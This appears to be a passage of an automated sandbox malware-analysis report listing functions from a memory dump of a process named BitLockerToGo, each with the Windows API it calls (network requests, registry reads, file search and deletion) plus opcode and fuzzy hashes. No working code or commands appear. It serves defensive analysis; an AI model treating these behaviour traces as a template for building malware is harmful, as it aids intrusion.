                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0002B95A,?,00000000,00000000), ref: 004A81F4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                                      • Opcode ID: 308a7b7744be5cb8f6b0706f6feb3b49287ddca8809c4f0042d1dfe2ddc3086b
                                                                                                                                                                                                                                      • Instruction ID: 5769b24c27c46c41d9c25dfcfc3aa76a7b019e23bb43e4b2d53dccd0a000004d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 308a7b7744be5cb8f6b0706f6feb3b49287ddca8809c4f0042d1dfe2ddc3086b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 281182723012449FD254DB5CEC91E6A73DAEFC4208B184539E55AC3361DA34B918CB18
                                                                                                                                                                                                                                      Function 0048F621 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 0048F6B3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2029273394-0
                                                                                                                                                                                                                                      • Opcode ID: 8fcd4c675e21d226723af0550db22f3386e49239c1e7e5cc925d4a189d0d6cb5
                                                                                                                                                                                                                                      • Instruction ID: dcb54e7ec7cb689b64abed46c364765b8413e14cdb093d7bba59c56e521d745d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fcd4c675e21d226723af0550db22f3386e49239c1e7e5cc925d4a189d0d6cb5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B1154767002088FCB40DB9CDDC1FD973B5BF88318F044668A919C7356DA35EA68CB89
                                                                                                                                                                                                                                      Function 00485170 Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • HttpSendRequestA.WININET(?,00000000,00000000,00000000,?), ref: 004851D7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HttpRequestSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 360639707-0
                                                                                                                                                                                                                                      • Opcode ID: 40efa1c23cde69dd410dcb300d35dd933f5dbf8fae11a7d096c74dd6bb9e6f86
                                                                                                                                                                                                                                      • Instruction ID: 9c3cec8a9f5939ce4b7ec87d7cd6d5e4320ad79c60ea8e39c437b22ad13c3b14
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40efa1c23cde69dd410dcb300d35dd933f5dbf8fae11a7d096c74dd6bb9e6f86
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 120152717101159FCB88EFACDC98E6D7BFAEFC87447180428A00AD7325DA309D15CB68
                                                                                                                                                                                                                                      Function 0049FEC1 Relevance: 1.5, APIs: 1, Instructions: 45registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0049FF42
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: 8b36534c47bdc6f26867f3ca6aac82ea10d651e62fc64f2b753ea1cec1f7c463
                                                                                                                                                                                                                                      • Instruction ID: 33a49a131eb4670b2f7ec9844b92aa1880d746f1bd956f414a9518ae4df93918
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b36534c47bdc6f26867f3ca6aac82ea10d651e62fc64f2b753ea1cec1f7c463
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C01D8B16002055FD358DF58DC91E6777E9FB94304F04003DE446D3362EB74A904CB69
                                                                                                                                                                                                                                      Function 0049F27D Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,004D2DB6,00000000,00020119), ref: 0049F2E3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: d8643b4e3f7f6eaba2dcd3442561c39d741c52a78c6fa186222106ed5beda4d8
                                                                                                                                                                                                                                      • Instruction ID: c6c1ad163c71b66d2d049da566e2844474f4fc7a49a94a98121188f2e8e19c32
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8643b4e3f7f6eaba2dcd3442561c39d741c52a78c6fa186222106ed5beda4d8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EF0C2B1700104AFD288DB6DEC96E2B73AEDBD1298B09403CF805C7392D6A19C24C729
                                                                                                                                                                                                                                      Function 004A0420 Relevance: 1.5, APIs: 1, Instructions: 40registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,004D2EF8,00000000,00020119), ref: 004A047D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: 7cad9042ea4e7066e087c4c48ae6569ff1643c0aec2f6288164dd0667619266f
                                                                                                                                                                                                                                      • Instruction ID: 248287c696445c55cc5614d77a09d26b1cd33b48c504d525a1b08e14b052b056
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cad9042ea4e7066e087c4c48ae6569ff1643c0aec2f6288164dd0667619266f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F0F6726412116FD214DB2ADC4AD6B7A6CEBC2314F05413CF408C7302D674A914C7AA
                                                                                                                                                                                                                                      Function 0049FC37 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0049FC8B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1890195054-0
                                                                                                                                                                                                                                      • Opcode ID: 7c6c7e7d4d4111f373f72eeb8d3b205c6ca3ef23546f18158c24960fde115c0c
                                                                                                                                                                                                                                      • Instruction ID: 1fc50de98217c170b310f215a90c7957499e8e5868a550ad2698122f0e576a62
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c6c7e7d4d4111f373f72eeb8d3b205c6ca3ef23546f18158c24960fde115c0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BF090B26142006FD354EF6DDC85E5B7BA9FBC9714F00413CB25AD3391DA78A940C769
                                                                                                                                                                                                                                      Function 004A0499 Relevance: 1.5, APIs: 1, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,004D2F19,?,?,?,?), ref: 004A04D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                                                                                                                      • Opcode ID: 6f84fc7f4236d7446530ce15f68cc3a8c26b309c95be2d679f79d89b3f4fce10
                                                                                                                                                                                                                                      • Instruction ID: bb6d84b6be30f14b6c913f065a6bc553e92fc8eaf678513a5f487ca866937d2d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f84fc7f4236d7446530ce15f68cc3a8c26b309c95be2d679f79d89b3f4fce10
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F09032204124AFD354DB8BEC84D9B77A8EB88218F04083DF69DC3211E764AA19CBA5
                                                                                                                                                                                                                                      Function 00487189 Relevance: 1.5, APIs: 1, Instructions: 37networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00487197
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleInternet
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1081599783-0
                                                                                                                                                                                                                                      • Opcode ID: 06236e444c6987357e6bcd6055ae4c730169e1eb8aaee6f7be2bf9ad3d25b377
                                                                                                                                                                                                                                      • Instruction ID: dfba236ba0e7f6024edc54f0ad53aae6fc8939ac3f0cc666d407038cce8e2513
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06236e444c6987357e6bcd6055ae4c730169e1eb8aaee6f7be2bf9ad3d25b377
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07013172A00154AFDF48DB98DC94F9D77B9EFC8300B154024E915E7711DA3AAE418B58
                                                                                                                                                                                                                                      Function 0048785A Relevance: 1.5, APIs: 1, Instructions: 36networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HttpRequestSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 360639707-0
                                                                                                                                                                                                                                      • Opcode ID: a4bd861af431437a3b0e0f20028ea73bba490f6f1adbea4693712bd3854c601c
                                                                                                                                                                                                                                      • Instruction ID: 40b1ee2a7bb2fa72a88715256651216197aef2bc77bcbc6d7e6543d4a72be6d9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4bd861af431437a3b0e0f20028ea73bba490f6f1adbea4693712bd3854c601c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDF0AFB2600645ABD354DF38EC91FA973E9AB8D304F058668B615D72D2EA30AD50CB14
                                                                                                                                                                                                                                      Function 00481124 Relevance: 1.5, APIs: 1, Instructions: 35registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 0048116F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: e15ef70681a7cefdd59757e51c83800eb41769e853c23d272b22ca0ac233b5e3
                                                                                                                                                                                                                                      • Instruction ID: ea48daec7983c3e624ea5d609fbf7d0cebb5eb0ea171728040a22fa777b0f914
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e15ef70681a7cefdd59757e51c83800eb41769e853c23d272b22ca0ac233b5e3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08F05EB1304204AFD348DB29DC96E3B76AEEBC529CB09412CF545C7251CA719D108725
                                                                                                                                                                                                                                      Function 00489D4A Relevance: 1.5, APIs: 1, Instructions: 35networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 00489D9B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: connect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1959786783-0
                                                                                                                                                                                                                                      • Opcode ID: b1f1ecae42d1669aa4228842134e84e8a43a14c1ccd07c04ebc00babfd668d65
                                                                                                                                                                                                                                      • Instruction ID: 8eceab68daa660819ebe1bca72efcce8e60d74dd95a5a24c4f35f0341a32b691
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1f1ecae42d1669aa4228842134e84e8a43a14c1ccd07c04ebc00babfd668d65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F01F675200300DFC768DF59DD95E16B3E6AF88304B14882DA5AAD7392D678E854CB19
                                                                                                                                                                                                                                      Function 0049F2FF Relevance: 1.5, APIs: 1, Instructions: 34registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,004D2DF1,?,?,?,?), ref: 0049F336
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                                                                                                                      • Opcode ID: b961491f5b59e0cfb0bbcd0c790385c4f051b2b6aac19c306d68ad57c4c31eab
                                                                                                                                                                                                                                      • Instruction ID: fcf9dd5c8ea3ff4f26e27d4ac9df4e83eb24b868a77855256e78119c97b53f2e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b961491f5b59e0cfb0bbcd0c790385c4f051b2b6aac19c306d68ad57c4c31eab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84F0EC766010006FC144978CEC95C9BB3AEEFD4214708403AF50DC7320D6B5AD10C72C
                                                                                                                                                                                                                                      Function 0048658C Relevance: 1.5, APIs: 1, Instructions: 34networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 004865D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HttpRequestSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 360639707-0
                                                                                                                                                                                                                                      • Opcode ID: 8b5f5ff3dc3c62bd2a8f30d327705dd2fc30f5b7d954f016bed8489edd84f0af
                                                                                                                                                                                                                                      • Instruction ID: 7062b00ef8b7e56fbcbf4d0d915d128b03124e898bee1ecacd04f9e05a2ce6db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b5f5ff3dc3c62bd2a8f30d327705dd2fc30f5b7d954f016bed8489edd84f0af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26F0F9B2B01115EFCB48CBA9DC94D7EBBB6BF88354718002DA406D33A1CA305C11DB48
                                                                                                                                                                                                                                      Function 0049FF59 Relevance: 1.5, APIs: 1, Instructions: 33registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,004D2EC3,00000000,?,?), ref: 0049FF9F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                                                                                                                      • Opcode ID: 25b52bf0ab3dfeef432c1e8a2c0938e91886e89bacda87f57e189ae6f0bc3dcc
                                                                                                                                                                                                                                      • Instruction ID: 47a54e74d66963192abb511ae4fee4eb61f175f2a6590f6361ed7b7fae0285e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25b52bf0ab3dfeef432c1e8a2c0938e91886e89bacda87f57e189ae6f0bc3dcc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83F09A71700101AFE3088B49DC91F2A73E8ABC8314F08443DF846D7391E7B8ED058BAA
                                                                                                                                                                                                                                      Function 0048BC40 Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 0839e428fafbde4326030cb4fd2cc16a87f4763f9f112c51b068793db7e5605f
                                                                                                                                                                                                                                      • Instruction ID: bf78f513cdbf5ce80608580a890a033c6b01b98caf5f3d47550d07114d64844b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0839e428fafbde4326030cb4fd2cc16a87f4763f9f112c51b068793db7e5605f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FF0F631A053058BC304EF2DCD80D5577F5FFC4614F44862CE88883262EA30DA56C7C6
                                                                                                                                                                                                                                      Function 00487A42 Relevance: 1.5, APIs: 1, Instructions: 31networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET ref: 00487A4F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleInternet
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1081599783-0
                                                                                                                                                                                                                                      • Opcode ID: 7e40d6959903667c7dd33fe16daf09e31bf7a03a7535184b13f5209d7689d16e
                                                                                                                                                                                                                                      • Instruction ID: a62723addcbb395dbc69ee795ae571949dff7196d43ad9b83010da3684832bab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e40d6959903667c7dd33fe16daf09e31bf7a03a7535184b13f5209d7689d16e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3F0DA76A0006AEBCF44DF98FC95CDCB764FB843287144425ED1AE3210DA34BE55CB94
                                                                                                                                                                                                                                      Function 004A8B6F Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 004A8B8D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2029273394-0
                                                                                                                                                                                                                                      • Opcode ID: ae31c3f997cec15f5ddf59b9a5aae693fafbbbd6352711d5c9e0f4ba12879182
                                                                                                                                                                                                                                      • Instruction ID: 54bf55c6915f4c4ec28a48fc5a056f46032d6ea0e72c19aa1fcda6e21ad0c1ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae31c3f997cec15f5ddf59b9a5aae693fafbbbd6352711d5c9e0f4ba12879182
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5F0E273A00149AFEF41CB88EC80ED877B6EB90200F054072E919E7260D735AE4A8F84
                                                                                                                                                                                                                                      Function 00489CA9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 00489CF5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: getaddrinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 300660673-0
                                                                                                                                                                                                                                      • Opcode ID: ef93de436ae4715d530f2ca37e2078cff561bd7959ef3a09ea22550ce1b1b525
                                                                                                                                                                                                                                      • Instruction ID: 1d2aff6a960a919c311aa7ce9d64bfc883b324bfd46b991f46ae8488dad6d2f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef93de436ae4715d530f2ca37e2078cff561bd7959ef3a09ea22550ce1b1b525
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F049B1A04348DFD750CF64CC84B9AB7E4FF85308F01C529A89897202E7B4A9948B55
                                                                                                                                                                                                                                      Function 00493142 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0049315E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DeleteFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4033686569-0
                                                                                                                                                                                                                                      • Opcode ID: 8f34657e719e693bffef1eb801ff409e793afaeaf3cc9cb3a0f4b5bd3d1cd8ba
                                                                                                                                                                                                                                      • Instruction ID: eb4033c9b07fed4e2a72c4770dd1afbf7ac3dbe29e4952e7ee8ed27ce6657b30
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f34657e719e693bffef1eb801ff409e793afaeaf3cc9cb3a0f4b5bd3d1cd8ba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37F0A0B27005688BCB49D758DCA5EBC37E3ABC830AB080049C906E7751CA786DA1DA4D
                                                                                                                                                                                                                                      Function 0048B98E Relevance: 1.5, APIs: 1, Instructions: 26processCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                                                                                      • Opcode ID: a9d825ffb33bb77807a09f8c5de03ade161f063333d682e8e783fe1c7127c37e
                                                                                                                                                                                                                                      • Instruction ID: bd09d5314c93f0e0931d92e32ab1d9e48dc36d57453bd820e642604ba5c18154
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9d825ffb33bb77807a09f8c5de03ade161f063333d682e8e783fe1c7127c37e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F0F9B5A087058BD709DF29C9906A9B7F0BF9C304F00C96DE899D3361EA30DA45CF05
                                                                                                                                                                                                                                      Function 00492EF8 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
